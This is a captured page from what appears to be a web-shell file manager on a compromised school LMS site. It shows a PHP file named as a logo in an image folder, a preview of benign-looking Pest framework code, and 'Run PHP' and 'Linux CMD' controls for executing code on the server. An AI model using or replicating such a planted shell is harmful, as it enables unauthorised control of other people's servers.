๐ File Manager
๐
/
/
home
/
u449181296
/
domains
/
birulogi.smakpbaleendah.sch.id
/
public_html
/
lms
/
tukang-ngatur
/
assets
/
img
/
qr-logos
/home/u449181296/domains/birulogi.smakpbaleendah.sch.id/public_html/lms/tukang-ngatur/assets/img/qr-logos
Upload
Name
Size
Date
CHMOD
Action
โ FILE โ
logo_1773801405.php
6.73 KB
2026-03-18 02:36
644
(rw-r--r--)
Edit
|
Rename
|
Preview
|
Del
๐งช PHP Preview
<?php declare(strict_types=1); namespace Pest; use NunoMaduro\Collision\Writer; use Pest\Exceptions\TestDescriptionMissing; use Pest\Support\Container; use Symfony\Component\Console\Output\ConsoleOutput; use Symfony\Component\Console\Output\OutputInterface; use Throwable; use Whoops\Exception\Inspector; final readonly class Panic { /** * Creates a new Panic instance. */ private function __construct( private Throwable $throwable ) { // ... } /** * Creates a new Panic instance, and exits the application. */ public static function with(Throwable $throwable): never { if ($throwable instanceof TestDescriptionMissing && ! is_null($previous = $throwable->getPrevious())) { $throwable = $previous; } $panic = new self($throwable); $panic->handle(); exit(1); } /** * Handles the panic. */ private function handle(): void { try { $output = Container::getInstance()->get(OutputInterface::class); } catch (Throwable) { $output = new ConsoleOutput; } assert($output instanceof OutputInterface); if ($this->throwable instanceof Contracts\Panicable) { $this->throwable->render($output); exit($this->throwable->exitCode()); } $writer = new Writer(null, $output); $inspector = new Inspector($this->throwable); $writer->write($inspector); $output->writeln(''); exit(1); } }
Run PHP
๐ฅ Linux CMD
Run CMD